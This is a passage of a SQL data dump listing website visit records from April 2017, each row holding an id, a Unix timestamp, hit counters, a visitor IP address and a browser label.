578,1,1,0,0,'8.29.198.25','other'),(101173,1492368683,1,1,0,0,'217.182.132.172','other'),(101174,1492368726,1,1,0,0,'51.255.65.27','other'),(101175,1492368794,1,1,0,0,'27.17.15.26','msie'),(101176,1492368886,1,1,0,0,'207.46.13.8','other'),(101177,1492369251,1,0,1,0,'66.249.76.107',''),(101178,1492369286,1,1,0,0,'164.132.161.33','other'),(101179,1492370315,1,0,1,0,'66.249.76.109',''),(101180,1492370634,1,1,0,0,'208.43.225.84','other'),(101181,1492371639,1,1,0,0,'217.182.132.4','other'),(101182,1492371677,1,1,0,0,'164.132.161.60','other'),(101183,1492371741,3,3,0,0,'5.9.60.241','other'),(101184,1492371997,1,1,0,0,'51.255.65.50','other'),(101185,1492372354,1,1,0,0,'164.132.161.92','other'),(101186,1492372520,1,1,0,0,'51.255.65.22','other'),(101187,1492374198,1,1,0,0,'51.255.65.41','other'),(101188,1492374340,1,1,0,0,'216.244.66.237','other'),(101189,1492374488,1,1,0,0,'217.182.132.30','other'),(101190,1492374943,1,1,0,0,'217.182.132.24','other'),(101191,1492375226,1,1,0,0,'164.132.161.27','other'),(101192,1492375669,1,1,0,0,'164.132.161.78','other'),(101193,1492375762,1,0,1,0,'66.249.76.27',''),(101194,1492376119,1,1,0,0,'137.74.207.170','other'),(101195,1492377635,1,1,0,0,'164.132.161.50','other'),(101196,1492377820,1,1,0,0,'217.182.132.148','other'),(101197,1492378018,1,1,0,0,'51.255.65.71','other'),(101198,1492378693,1,1,0,0,'217.69.133.69','other'),(101199,1492378703,1,1,0,0,'164.132.161.37','other'),(101200,1492379407,1,1,0,0,'8.29.198.27','other'),(101201,1492379419,1,1,0,0,'40.77.167.35','other'),(101202,1492379610,1,1,0,0,'164.132.161.46','other'),(101203,1492379618,1,0,1,0,'66.249.66.81',''),(101204,1492379890,1,1,0,0,'217.182.132.27','other'),(101205,1492380789,1,1,0,0,'164.132.161.48','other'),(101206,1492381245,1,1,0,0,'217.69.136.203','other'),(101207,1492381691,1,1,0,0,'51.255.65.32','other'),(101208,1492381793,1,1,0,0,'51.255.65.27','other'),(101209,1492382186,2,2,0,0,'95.213.141.126','opera'),(101210,1492382518,1,1,0,0,'217.182.132.20','other'),(101211,1492382851,1,1,0,0,'157.55.39.31','other'),(101212,1492383574,1,1,0,0,'164.132.161.39','other'),(101213,1492384025,1,1,0,0,'51.255.65.9','other'),(101214,1492384416,1,1,0,0,'51.255.71.131','other'),(101215,1492385014,1,1,0,0,'51.255.71.116','other'),(101216,1492385977,1,1,0,0,'217.182.132.97','other'),(101217,1492386152,2,2,0,0,'216.244.66.237','other'),(101218,1492387171,1,1,0,0,'51.255.65.54','other'),(101219,1492387178,1,0,1,0,'66.249.76.27',''),(101220,1492387396,1,1,0,0,'217.69.136.206','other'),(101221,1492387591,1,1,0,0,'51.255.65.58','other'),(101222,1492387707,1,1,0,0,'51.255.65.6','other'),(101223,1492388126,1,1,0,0,'66.249.76.108','chrome'),(101224,1492388295,1,1,0,0,'217.182.132.24','other'),(101225,1492388306,1,1,0,0,'217.182.132.72','other'),(101226,1492389696,1,1,0,0,'164.132.161.51','other'),(101227,1492389699,1,1,0,0,'216.244.66.237','other'),(101228,1492390088,1,1,0,0,'217.69.133.9','other'),(101229,1492390234,1,1,0,0,'8.29.198.25','other'),(101230,1492390347,1,1,0,0,'217.182.132.78','other'),(101231,1492390533,1,1,0,0,'180.76.15.29','other'),(101232,1492390752,1,1,0,0,'51.255.71.115','other'),(101233,1492391006,1,1,0,0,'217.69.133.226','other'),(101234,1492391340,1,1,0,0,'164.132.161.84','other'),(101235,1492391647,1,0,1,0,'66.249.76.109',''),(101236,1492391987,1,1,0,0,'216.244.66.237','other'),(101237,1492392117,1,0,1,0,'207.46.13.98',''),(101238,1492392433,1,1,0,0,'207.46.13.76','other'),(101239,1492392643,1,1,0,0,'51.255.65.3','other'),(101240,1492393027,1,1,0,0,'217.182.132.182','other'),(101241,1492393033,1,1,0,0,'164.132.161.20','other'),(101242,1492393219,1,1,0,0,'217.182.132.87','other'),(101243,1492393308,1,1,0,0,'51.255.65.30','other'),(101244,1492393388,1,1,0,0,'137.74.207.116','other'),(101245,1492393986,1,1,0,0,'164.132.162.158','other'),(101246,1492394256,1,0,1,0,'207.46.13.2',''),(101247,1492395741,1,1,0,0,'217.182.132.193','other'),(101248,1492395769,1,1,0,0,'51.255.65.93','other'),(101249,1492396094,1,1,0,0,'217.182.132.32','other'),(101250,1492396137,1,1,0,0,'217.182.132.73','other'),(101251,1492396362,1,1,0,0,'217.182.132.56','other'),(101252,1492396809,1,1,0,0,'217.182.132.180','other'),(101253,1492397042,1,1,0,0,'109.173.56.152','chrome'),(101254,1492397105,1,1,0,0,'217.182.132.191','other'),(101255,1492397634,1,1,0,0,'217.182.132.32','other'),(101256,1492398674,1,0,1,0,'66.249.66.87',''),(101257,1492398730,1,1,0,0,'217.69.133.227','other'),(101258,1492399002,1,1,0,0,'217.69.136.208','other'),(101259,1492399050,1,1,0,0,'217.182.132.23','other'),(101260,1492399064,1,1,0,0,'66.249.76.29','chrome'),(101261,1492399324,1,1,0,0,'217.69.133.84','other'),(101262,1492399608,1,1,0,0,'51.255.65.70','other'),(101263,1492399658,1,1,0,0,'51.255.71.128','other'),(101264,1492399760,1,1,0,0,'51.255.65.94','other'),(101265,1492399975,1,1,0,0,'164.132.161.67','other'),(101266,1492400164,1,1,0,0,'217.182.132.172','other'),(101267,1492400346,1,1,0,0,'207.46.13.120','other'),(101268,1492400479,1,1,0,0,'37.112.231.119','msie'),(101269,1492400767,1,1,0,0,'217.182.132.153','other'),(101270,1492400779,1,1,0,0,'164.132.161.46','other'),(101271,1492401057,1,1,0,0,'8.29.198.27','other'),(101272,1492401496,1,1,0,0,'51.255.65.9','other'),(101273,1492401746,1,1,0,0,'164.132.161.58','other'),(101274,1492401895,1,1,0,0,'46.147.119.63','msie'),(101275,1492402424,1,1,0,0,'51.255.65.2','other'),(101276,1492403123,1,1,0,0,'51.255.65.13','other'),(101277,1492403289,1,0,1,0,'66.249.76.108',''),(101278,1492403752,1,1,0,0,'93.80.144.131','msie'),(101279,1492404237,1,1,0,0,'51.255.65.75','other'),(101280,1492404247,1,1,0,0,'51.255.65.9','other'),(101281,1492404909,1,1,0,0,'51.255.71.131','other'),(101282,1492405099,1,1,0,0,'164.132.161.16','other'),(101283,1492405302,1,1,0,0,'217.182.132.4','other'),(101284,1492405932,1,1,0,0,'217.182.132.86','other'),(101285,1492406124,1,1,0,0,'217.182.132.146','other'),(101286,1492406252,2,2,0,0,'80.241.214.124','other'),(101287,1492406421,1,0,1,0,'66.249.76.107',''),(101288,1492406665,1,1,0,0,'164.132.161.37','other'),(101289,1492406730,1,1,0,0,'164.132.161.71','other'),(101290,1492406956,1,1,0,0,'188.32.66.41','msie'),(101291,1492407047,1,1,0,0,'141.0.13.130','other'),(101292,1492407078,1,1,0,0,'217.182.132.16','other'),(101293,1492407343,1,1,0,0,'217.182.132.33','other'),(101294,1492407552,1,1,0,0,'51.255.65.87','other'),(101295,1492408439,1,1,0,0,'66.102.9.27','chrome'),(101296,1492408519,1,1,0,0,'51.255.65.45','other'),(101297,1492409017,1,1,0,0,'92.112.249.55','firefox'),(101298,1492409383,1,1,0,0,'217.182.132.72','other'),(101299,1492410191,1,1,0,0,'164.132.161.78','other'),(101300,1492411012,1,1,0,0,'51.255.65.22','other'),(101301,1492411512,1,0,1,0,'66.249.76.107',''),(101302,1492411515,1,1,0,0,'164.132.161.89','other'),(101303,1492411615,4,4,0,0,'216.244.66.237','other'),(101304,1492411889,1,1,0,0,'8.29.198.26','other'),(101305,1492412504,1,0,1,0,'66.249.76.108',''),(101306,1492412730,1,1,0,0,'51.255.65.8','other'),(101307,1492412800,1,1,0,0,'164.132.161.47','other'),(101308,1492412846,1,1,0,0,'217.182.132.78','other'),(101309,1492413040,1,1,0,0,'164.132.161.41','other'),(101310,1492413384,1,1,0,0,'217.182.132.72','other'),(101311,1492413820,1,0,1,0,'66.249.66.180',''),(101312,1492413845,2,2,0,0,'173.212.204.146','other'),(101313,1492414904,1,0,1,0,'66.249.76.107',''),(101314,1492415388,1,1,0,0,'91.196.178.38','chrome'),(101315,1492415710,1,1,0,0,'217.182.132.187','other'),(101316,1492416483,1,1,0,0,'137.74.203.194','other'),(101317,1492417592,1,1,0,0,'37.112.231.119','msie'),(101318,1492417948,1,1,0,0,'91.196.178.70','chrome'),(101319,1492418274,1,1,0,0,'164.132.161.60','other'),(101320,1492418396,1,1,0,0,'37.204.152.138','msie'),(101321,1492418873,1,1,0,0,'51.255.65.72','other'),(101322,1492418946,1,1,0,0,'164.132.161.8','other'),(101323,1492418998,1,1,0,0,'51.255.65.50','other'),(101324,1492419438,1,0,1,0,'66.249.76.108',''),(101325,1492419666,1,0,1,0,'66.249.76.28',''),(101326,1492420478,1,0,1,0,'66.249.76.108',''),(101327,1492421314,1,1,0,0,'78.154.176.38','chrome'),(101328,1492421328,1,1,0,0,'5.255.253.43','other'),(101329,1492421575,1,1,0,0,'164.132.162.188','other'),(101330,1492421605,1,1,0,0,'51.255.71.100','other'),(101331,1492422478,1,1,0,0,'217.182.132.181','other'),(101332,1492422712,1,1,0,0,'8.29.198.25','other'),(101333,1492423190,1,1,0,0,'51.255.65.40','other'),(101334,1492423285,1,1,0,0,'164.132.161.55','other'),(101335,1492423623,1,1,0,0,'66.249.76.109','chrome'),(101336,1492423749,1,1,0,0,'217.182.132.81','other'),(101337,1492424459,1,1,0,0,'185.53.79.100','firefox'),(101338,1492424468,1,1,0,0,'164.132.161.49','other'),(101339,1492424621,1,1,0,0,'217.69.133.234','other'),(101340,1492425941,1,1,0,0,'217.182.132.240','other'),(101341,1492426985,1,1,0,0,'51.255.65.86','other'),(101342,1492427286,1,1,0,0,'164.132.161.22','other'),(101343,1492427327,1,1,0,0,'51.255.71.129','other'),(101344,1492427816,1,1,0,0,'216.244.66.237','other'),(101345,1492428055,1,1,0,0,'217.69.133.69','other'),(101346,1492428222,1,1,0,0,'92.112.249.55','firefox'),(101347,1492428707,1,1,0,0,'51.255.71.125','other'),(101348,1492429355,1,1,0,0,'217.69.133.224','other'),(101349,1492429858,1,1,0,0,'66.249.76.29','chrome'),(101350,1492429866,1,1,0,0,'91.196.178.40','chrome'),(101351,1492429884,1,1,0,0,'130.180.220.56','chrome'),(101352,1492430122,1,1,0,0,'217.182.132.178','other'),(101353,1492431373,1,1,0,0,'164.132.162.157','other'),(101354,1492431564,1,1,0,0,'207.46.13.46','other'),(101355,1492431644,2,2,0,0,'195.216.206.38','other'),(101356,1492433539,1,1,0,0,'8.29.198.27','other'),(101357,1492434152,1,0,1,0,'66.249.76.107',''),(101358,1492434169,1,1,0,0,'164.132.161.78','other'),(101359,1492434321,1,1,0,0,'164.132.161.46','other'),(101360,1492434620,1,1,0,0,'164.132.161.38','other'),(101361,1492434983,1,1,0,0,'51.255.65.97','other'),(101362,1492435199,1,0,1,0,'68.180.229.34',''),(101363,1492435771,1,1,0,0,'164.132.162.164','other'),(101364,1492435866,1,1,0,0,'217.182.132.147','other'),(101365,1492435908,1,1,0,0,'51.255.65.58','other'),(101366,1492436615,1,1,0,0,'92.113.174.59','chrome'),(101367,1492437107,1,1,0,0,'137.74.201.108','other'),(101368,1492437181,1,1,0,0,'51.255.64.106','other'),(101369,1492437232,1,0,1,0,'157.55.39.215',''),(101370,1492437411,1,1,0,0,'217.182.132.28','other'),(101371,1492437472,1,0,1,0,'66.249.66.183',''),(101372,1492437704,1,1,0,0,'217.69.133.229','other'),(101373,1492438367,1,1,0,0,'137.74.203.194','other'),(101374,1492439194,1,1,0,0,'51.255.71.127','other'),(101375,1492439247,1,1,0,0,'51.255.71.119','other'),(101376,1492439411,1,1,0,0,'164.132.161.64','other'),(101377,1492439607,1,1,0,0,'164.132.161.20','other'),(101378,1492439779,1,1,0,0,'217.182.132.91','other'),(101379,1492440459,1,1,0,0,'164.132.161.7','other'),(101380,1492440858,1,0,1,0,'66.249.66.84',''),(101381,1492441089,1,1,0,0,'51.255.71.117','other'),(101382,1492441706,1,1,0,0,'51.255.65.82','other'),(101383,1492441718,1,1,0,0,'51.255.65.16','other'),(101384,1492441754,1,1,0,0,'217.182.132.85','other'),(101385,1492442203,1,1,0,0,'51.255.65.78','other'),(101386,1492442336,1,0,1,0,'66.249.76.29',''),(101387,1492442342,1,0,1,0,'66.249.76.27',''),(101388,1492442586,1,1,0,0,'51.255.65.34','other'),(101389,1492443129,1,1,0,0,'164.132.161.24','other'),(101390,1492443179,1,1,0,0,'217.182.132.188','other'),(101391,1492443533,1,1,0,0,'217.69.133.227','other'),(101392,1492443535,1,1,0,0,'217.69.133.226','other'),(101393,1492444049,2,2,0,0,'216.244.66.237','other'),(101394,1492444075,1,1,0,0,'180.76.15.144','other'),(101395,1492444206,2,0,2,0,'66.249.76.107',''),(101396,1492444364,1,1,0,0,'8.29.198.25','other'),(101397,1492445210,1,1,0,0,'66.249.66.183','chrome'),(101398,1492445437,1,0,1,0,'40.77.167.63',''),(101399,1492445867,1,0,1,0,'66.249.66.81',''),(101400,1492445888,1,1,0,0,'164.132.161.88','other'),(101401,1492446051,1,1,0,0,'217.182.132.21','other'),(101402,1492447189,1,1,0,0,'217.69.133.231','other'),(101403,1492447353,1,1,0,0,'164.132.161.76','other'),(101404,1492447986,1,1,0,0,'164.132.161.28','other'),(101405,1492448000,1,1,0,0,'217.182.132.90','other'),(101406,1492448239,1,1,0,0,'51.255.65.59','other'),(101407,1492448634,1,1,0,0,'51.255.65.15','other'),(101408,1492449595,1,1,0,0,'216.244.66.237','other'),(101409,1492449890,1,1,0,0,'51.255.65.40','other'),(101410,1492450498,1,1,0,0,'51.255.65.19','other'),(101411,1492450765,1,0,1,0,'66.249.66.180',''),(101412,1492450861,1,0,1,0,'66.249.66.87',''),(101413,1492451490,1,1,0,0,'164.132.161.28','other'),(101414,1492452119,1,1,0,0,'217.182.132.72','other'),(101415,1492452333,1,0,1,0,'66.249.76.108',''),(101416,1492452645,1,1,0,0,'137.74.207.114','other'),(101417,1492452860,1,1,0,0,'164.132.161.82','other'),(101418,1492453550,1,1,0,0,'164.132.161.66','other'),(101419,1492453807,1,1,0,0,'137.74.207.102','other'),(101420,1492453900,2,2,0,0,'95.108.213.34','other'),(101421,1492454275,1,1,0,0,'164.132.162.153','other'),(101422,1492454311,1,1,0,0,'51.255.71.117','other'),(101423,1492454388,2,2,0,0,'216.244.66.237','other'),(101424,1492454720,1,1,0,0,'51.255.65.97','other'),(101425,1492454820,1,1,0,0,'40.77.167.63','other'),(101426,1492455195,1,1,0,0,'8.29.198.27','other'),(101427,1492455533,1,0,1,0,'157.55.39.75',''),(101428,1492455646,1,0,1,0,'66.249.66.180',''),(101429,1492456461,1,1,0,0,'51.255.71.98','other'),(101430,1492457251,1,1,0,0,'164.132.162.158','other'),(101431,1492457579,1,1,0,0,'217.69.133.3','other'),(101432,1492457901,1,1,0,0,'91.196.178.38','chrome'),(101433,1492459082,1,1,0,0,'51.255.71.116','other'),(101434,1492459156,1,1,0,0,'217.182.132.62','other'),(101435,1492459273,1,0,1,0,'66.249.66.177',''),(101436,1492459484,1,1,0,0,'217.182.132.36','other'),(101437,1492460237,1,0,1,0,'66.249.76.28',''),(101438,1492460421,1,0,1,0,'66.249.66.177',''),(101439,1492460487,1,0,1,0,'66.249.76.108',''),(101440,1492460704,1,1,0,0,'137.74.207.108','other'),(101441,1492460798,1,1,0,0,'217.182.132.90','other'),(101442,1492460817,1,1,0,0,'164.132.161.14','other'),(101443,1492461286,1,1,0,0,'164.132.161.71','other'),(101444,1492461839,1,1,0,0,'157.55.39.75','other'),(101445,1492462925,1,1,0,0,'51.255.65.50','other'),(101446,1492462947,1,0,1,0,'66.249.76.29',''),(101447,1492463104,2,2,0,0,'216.244.66.237','other'),(101448,1492463455,1,1,0,0,'217.182.132.149','other'),(101449,1492463516,1,1,0,0,'157.55.39.71','other'),(101450,1492463937,1,1,0,0,'164.132.161.82','other'),(101451,1492464472,1,1,0,0,'51.255.71.133','other'),(101452,1492464522,1,1,0,0,'164.132.161.79','other'),(101453,1492464761,1,1,0,0,'217.69.136.210','other'),(101454,1492465489,1,1,0,0,'164.132.161.56','other'),(101455,1492465528,1,1,0,0,'216.244.66.237','other'),(101456,1492465579,1,1,0,0,'217.182.132.66','other'),(101457,1492465750,1,1,0,0,'164.132.161.5','other'),(101458,1492465822,1,1,0,0,'180.76.15.13','other'),(101459,1492466009,1,1,0,0,'51.255.65.74','other'),(101460,1492466022,1,1,0,0,'8.29.198.27','other'),(101461,1492466180,1,1,0,0,'51.255.65.44','other'),(101462,1492466412,1,1,0,0,'217.69.133.217','other'),(101463,1492466484,1,1,0,0,'176.31.231.10','other'),(101464,1492466586,1,1,0,0,'157.55.39.71','other'),(101465,1492467185,1,1,0,0,'51.255.65.76','other'),(101466,1492467402,1,0,1,0,'66.249.76.107',''),(101467,1492467707,1,1,0,0,'217.182.132.152','other'),(101468,1492468022,1,1,0,0,'216.244.66.237','other'),(101469,1492468097,1,1,0,0,'217.182.132.151','other'),(101470,1492468452,1,1,0,0,'217.182.132.146','other'),(101471,1492468460,1,1,0,0,'51.255.65.35','other'),(101472,1492468514,1,1,0,0,'51.255.65.8','other'),(101473,1492468518,1,1,0,0,'164.132.161.33','other'),(101474,1492468848,1,1,0,0,'46.4.116.197','other'),(101475,1492468854,1,1,0,0,'141.8.142.15','other'),(101476,1492468908,1,1,0,0,'164.132.161.47','other'),(101477,1492468912,1,1,0,0,'164.132.161.82','other'),(101478,1492469139,1,1,0,0,'51.255.65.97','other'),(101479,1492470962,1,1,0,0,'51.255.65.15','other'),(101480,1492471292,1,1,0,0,'164.132.161.94','other'),(101481,1492472324,1,0,1,0,'66.249.76.107',''),(101482,1492473083,1,1,0,0,'51.255.71.128','other'),(101483,1492473652,1,1,0,0,'66.249.76.108','chrome'),(101484,1492474425,1,1,0,0,'51.255.65.75','other'),(101485,1492474588,1,1,0,0,'164.132.161.90','other'),(101486,1492474595,1,1,0,0,'217.69.136.210','other'),(101487,1492474610,1,1,0,0,'51.255.65.38','other'),(101488,1492474748,1,1,0,0,'217.182.132.178','other'),(101489,1492474770,1,1,0,0,'217.182.132.50','other'),(101490,1492474779,1,1,0,0,'217.182.132.95','other'),(101491,1492474970,1,0,1,0,'66.249.76.28',''),(101492,1492476855,1,1,0,0,'8.29.198.26','other'),(101493,1492476975,1,0,1,0,'66.249.76.109',''),(101494,1492478415,1,1,0,0,'164.132.161.46','other'),(101495,1492478770,1,1,0,0,'216.244.66.237','other'),(101496,1492478884,1,1,0,0,'217.182.132.23','other'),(101497,1492479031,1,1,0,0,'164.132.161.31','other'),(101498,1492479182,1,1,0,0,'51.255.65.54','other'),(101499,1492479261,1,1,0,0,'217.182.132.25','other'),(101500,1492479398,1,1,0,0,'164.132.161.73','other'),(101501,1492479869,1,1,0,0,'217.182.132.30','other'),(101502,1492480112,1,0,1,0,'66.249.66.177',''),(101503,1492480152,1,1,0,0,'217.69.136.206','other'),(101504,1492480260,1,1,0,0,'151.80.27.118','other'),(101505,1492480425,1,1,0,0,'164.132.161.9','other'),(101506,1492480711,1,1,0,0,'217.182.132.187','other'),(101507,1492481543,1,0,1,0,'66.249.76.108',''),(101508,1492481547,1,1,0,0,'66.249.76.108','chrome'),(101509,1492481552,2,2,0,0,'216.244.66.237','other'),(101511,1492481591,1,1,0,0,'141.8.142.154','other'),(101512,1492481594,3,3,0,0,'5.255.253.63','other'),(101513,1492481624,1,1,0,0,'40.77.167.59','other'),(101514,1492482174,1,1,0,0,'51.255.65.27','other'),(101515,1492482177,1,1,0,0,'51.255.64.106','other'),(101516,1492482231,1,0,1,0,'66.249.76.29',''),(101517,1492482457,1,0,1,0,'66.249.66.81',''),(101518,1492482726,1,1,0,0,'51.255.65.41','other'),(101519,1492483135,1,1,0,0,'137.74.207.159','other'),(101520,1492483277,1,1,0,0,'51.255.65.40','other'),(101521,1492484219,1,1,0,0,'51.255.65.39','other'),(101522,1492484244,1,1,0,0,'217.182.132.54','other'),(101523,1492484726,1,1,0,0,'216.244.66.237','other'),(101524,1492484745,1,1,0,0,'217.182.132.7','other'),(101525,1492485535,1,0,1,0,'66.249.66.177',''),(101526,1492485733,1,1,0,0,'217.182.132.170','other'),(101527,1492485805,1,0,1,0,'66.249.76.108',''),(101528,1492486227,1,1,0,0,'217.182.132.152','other'),(101529,1492486412,1,0,1,0,'66.249.76.109',''),(101530,1492487683,1,1,0,0,'8.29.198.26','other'),(101531,1492488084,1,1,0,0,'164.132.161.14','other'),(101532,1492488490,1,0,1,0,'66.249.66.81',''),(101533,1492489989,1,1,0,0,'51.255.71.119','other'),(101534,1492490624,1,1,0,0,'217.69.133.234','other'),(101535,1492490664,1,1,0,0,'51.255.65.92','other'),(101536,1492491255,1,1,0,0,'66.102.9.61','chrome'),(101537,1492491368,1,1,0,0,'217.182.132.176','other'),(101538,1492491620,1,1,0,0,'217.182.132.148','other'),(101539,1492492026,1,1,0,0,'91.196.178.72','firefox'),(101540,1492493119,1,1,0,0,'164.132.161.90','other'),(101541,1492493292,1,1,0,0,'51.255.65.7','other'),(101542,1492493550,1,1,0,0,'82.145.220.186','chrome'),(101543,1492493571,1,1,0,0,'141.8.142.15','other'),(101544,1492493789,1,1,0,0,'217.69.133.3','other'),(101545,1492493941,1,1,0,0,'80.241.214.124','other'),(101546,1492494390,1,1,0,0,'164.132.161.4','other'),(101547,1492494419,1,1,0,0,'51.255.65.91','other'),(101548,1492494571,1,1,0,0,'137.74.207.119','other'),(101549,1492494613,1,1,0,0,'164.132.161.59','other'),(101550,1492494844,1,1,0,0,'51.255.65.30','other'),(101551,1492494978,1,1,0,0,'164.132.161.77','other'),(101552,1492495212,1,1,0,0,'91.225.95.131','chrome'),(101553,1492495296,1,1,0,0,'217.182.132.192','other'),(101554,1492495321,1,1,0,0,'91.196.178.129','chrome'),(101555,1492495334,1,1,0,0,'95.108.213.34','other'),(101556,1492495417,1,1,0,0,'91.196.178.36','firefox'),(101557,1492495502,1,1,0,0,'91.196.178.164','chrome'),(101558,1492495680,1,1,0,0,'91.196.178.71','firefox'),(101559,1492495950,1,0,1,0,'66.249.66.183',''),(101560,1492495954,1,1,0,0,'91.196.178.72','firefox'),(101561,1492496014,1,1,0,0,'91.196.178.72','chrome'),(101562,1492496122,1,1,0,0,'66.249.76.29','chrome'),(101563,1492496345,1,1,0,0,'217.182.132.170','other'),(101564,1492496499,1,1,0,0,'51.255.65.60','other'),(101565,1492496703,1,1,0,0,'217.182.132.151','other'),(101566,1492496796,1,1,0,0,'164.132.161.52','other'),(101567,1492497152,1,1,0,0,'217.182.132.75','other'),(101568,1492497190,1,1,0,0,'91.196.178.67','chrome'),(101569,1492497347,1,1,0,0,'217.182.132.63','other'),(101570,1492497348,2,2,0,0,'91.196.178.71','firefox'),(101571,1492497985,1,1,0,0,'91.196.178.164','chrome'),(101572,1492498107,1,1,0,0,'51.255.65.5','other'),(101573,1492498367,1,1,0,0,'93.74.212.147','firefox'),(101574,1492498398,1,1,0,0,'91.196.178.72','firefox'),(101575,1492498523,1,1,0,0,'8.29.198.26','other'),(101576,1492499384,1,1,0,0,'51.255.65.45','other'),(101577,1492499414,1,1,0,0,'217.182.132.84','other'),(101578,1492499596,1,1,0,0,'51.255.65.46','other'),(101579,1492499895,1,1,0,0,'93.74.212.147','firefox'),(101580,1492500304,1,1,0,0,'51.255.65.62','other'),(101581,1492500435,1,1,0,0,'51.255.65.78','other'),(101582,1492500528,1,1,0,0,'91.196.178.129','chrome'),(101583,1492500714,1,1,0,0,'207.46.13.99','other'),(101584,1492500743,1,0,1,0,'66.249.76.28',''),(101585,1492501366,1,1,0,0,'95.28.200.105','msie'),(101586,1492501419,1,1,0,0,'92.113.191.77','chrome'),(101587,1492501469,1,0,1,0,'66.249.76.107',''),(101588,1492501622,1,1,0,0,'164.132.161.41','other'),(101589,1492501836,1,1,0,0,'164.132.161.3','other'),(101590,1492502348,1,0,1,0,'66.249.76.29',''),(101591,1492502526,1,1,0,0,'37.52.243.79','chrome'),(101592,1492503230,1,1,0,0,'141.8.142.164','other'),(101593,1492503231,1,1,0,0,'5.255.253.63','other'),(101594,1492503300,1,1,0,0,'164.132.162.188','other'),(101595,1492505364,2,2,0,0,'82.207.38.79','chrome'),(101596,1492505560,1,1,0,0,'78.111.190.133','chrome'),(101597,1492505651,1,1,0,0,'164.132.161.3','other'),(101598,1492505670,1,1,0,0,'130.180.218.55','firefox'),(101599,1492505722,1,1,0,0,'51.255.65.88','other'),(101600,1492506006,1,1,0,0,'66.249.76.108','chrome'),(101601,1492506092,1,0,1,0,'66.249.76.107',''),(101602,1492506148,1,1,0,0,'217.182.132.71','other'),(101603,1492506719,1,1,0,0,'217.69.136.205','other'),(101604,1492507396,1,1,0,0,'51.255.65.31','other'),(101605,1492507726,1,0,1,0,'66.249.66.177',''),(101606,1492507790,1,1,0,0,'91.196.178.72','firefox'),(101607,1492507991,1,1,0,0,'164.132.161.15','other'),(101608,1492508731,1,1,0,0,'91.196.177.15','chrome'),(101609,1492508912,1,1,0,0,'51.255.65.14','other'),(101610,1492508982,2,2,0,0,'91.209.96.72','chrome'),(101611,1492509354,1,1,0,0,'217.182.132.157','other'),(101613,1492509361,1,0,1,0,'66.249.76.27',''),(101614,1492509563,1,1,0,0,'51.255.65.23','other'),(101615,1492509780,1,1,0,0,'65.19.138.33','other'),(101616,1492510399,1,0,1,0,'66.249.76.108',''),(101617,1492511090,1,0,1,0,'66.249.66.177',''),(101618,1492511384,1,1,0,0,'216.244.66.237','other'),(101619,1492512222,1,1,0,0,'164.132.161.82','other'),(101620,1492512305,2,2,0,0,'92.113.4.159','chrome'),(101621,1492512568,1,0,1,0,'66.249.66.81',''),(101622,1492512787,1,1,0,0,'216.244.66.237','other'),(101623,1492513347,1,1,0,0,'178.95.66.40','firefox'),(101624,1492513896,1,1,0,0,'51.255.65.8','other'),(101625,1492514465,1,1,0,0,'91.196.178.69','firefox'),(101626,1492514963,1,1,0,0,'31.43.1.219','chrome'),(101627,1492514980,1,1,0,0,'51.255.65.52','other'),(101628,1492515061,1,1,0,0,'217.182.132.146','other'),(101629,1492515063,1,1,0,0,'217.182.132.18','other'),(101630,1492515265,1,1,0,0,'217.182.132.185','other'),(101631,1492515410,1,0,1,0,'207.46.13.132',''),(101632,1492515791,1,1,0,0,'91.196.177.26','chrome'),(101633,1492516065,1,1,0,0,'217.182.132.15','other'),(101634,1492516964,1,1,0,0,'217.182.132.152','other'),(101635,1492517036,1,1,0,0,'217.69.133.240','other'),(101636,1492517100,1,1,0,0,'164.132.161.42','other'),(101637,1492517418,1,1,0,0,'94.178.117.180','firefox'),(101638,1492517615,1,1,0,0,'194.44.17.249','chrome'),(101639,1492517644,1,1,0,0,'91.229.121.2','chrome'),(101640,1492517744,1,1,0,0,'37.54.198.243','chrome'),(101641,1492517842,1,1,0,0,'137.74.207.108','other'),(101642,1492518292,1,1,0,0,'51.255.65.91','other'),(101643,1492518443,1,1,0,0,'51.255.71.130','other'),(101644,1492518455,1,1,0,0,'217.182.132.35','other'),(101645,1492518959,1,1,0,0,'51.255.65.42','other'),(101646,1492518965,2,2,0,0,'93.72.56.99','chrome'),(101647,1492519013,1,1,0,0,'91.196.178.39','chrome'),(101648,1492520124,1,1,0,0,'51.255.65.87','other'),(101649,1492520325,1,1,0,0,'91.196.178.132','chrome'),(101650,1492520503,1,1,0,0,'217.182.132.22','other'),(101651,1492520541,1,1,0,0,'51.255.173.25','other'),(101652,1492520614,1,1,0,0,'8.29.198.25','other'),(101653,1492520671,1,1,0,0,'194.44.144.18','chrome'),(101654,1492521273,1,1,0,0,'51.255.71.131','other'),(101655,1492521405,1,1,0,0,'37.53.131.137','opera'),(101656,1492521497,8,0,8,0,'68.180.231.24',''),(101657,1492521529,1,1,0,0,'217.69.136.210','other'),(101658,1492522040,1,1,0,0,'164.132.162.187','other'),(101659,1492522059,1,1,0,0,'217.69.133.240','other'),(101660,1492522697,1,0,1,0,'66.249.76.107',''),(101661,1492522850,1,0,1,0,'68.180.231.24',''),(101662,1492523080,1,0,1,0,'66.249.76.28',''),(101663,1492523757,1,1,0,0,'180.76.15.19','other'),(101664,1492523770,1,1,0,0,'164.132.162.188','other'),(101665,1492523883,1,1,0,0,'46.219.217.112','chrome'),(101666,1492524062,1,1,0,0,'91.196.178.39','chrome'),(101667,1492524522,1,1,0,0,'164.132.161.68','other'),(101668,1492524548,1,1,0,0,'217.69.133.220','other'),(101669,1492524859,1,1,0,0,'164.132.162.188','other'),(101670,1492525683,1,1,0,0,'46.219.217.112','chrome'),(101671,1492525787,1,1,0,0,'217.182.132.178','other'),(101672,1492526197,1,1,0,0,'180.76.15.7','other'),(101673,1492526644,1,1,0,0,'37.55.226.72','firefox'),(101674,1492527483,1,1,0,0,'46.219.217.112','chrome'),(101675,1492528785,1,1,0,0,'91.209.11.236','other'),(101676,1492529283,1,1,0,0,'46.219.217.112','chrome'),(101677,1492529301,1,1,0,0,'164.132.162.187','other'),(101678,1492529398,1,1,0,0,'217.182.132.174','other'),(101679,1492529639,1,1,0,0,'217.182.132.33','other'),(101680,1492529750,1,1,0,0,'217.182.132.32','other'),(101681,1492530008,1,1,0,0,'217.182.132.172','other'),(101682,1492530229,1,1,0,0,'164.132.161.50','other'),(101683,1492531083,1,1,0,0,'46.219.217.112','chrome'),(101684,1492531215,1,1,0,0,'217.182.132.62','other'),(101685,1492531264,1,1,0,0,'217.182.132.87','other'),(101686,1492531439,1,1,0,0,'8.29.198.25','other'),(101687,1492531467,1,1,0,0,'91.196.178.67','chrome'),(101688,1492531633,1,1,0,0,'66.102.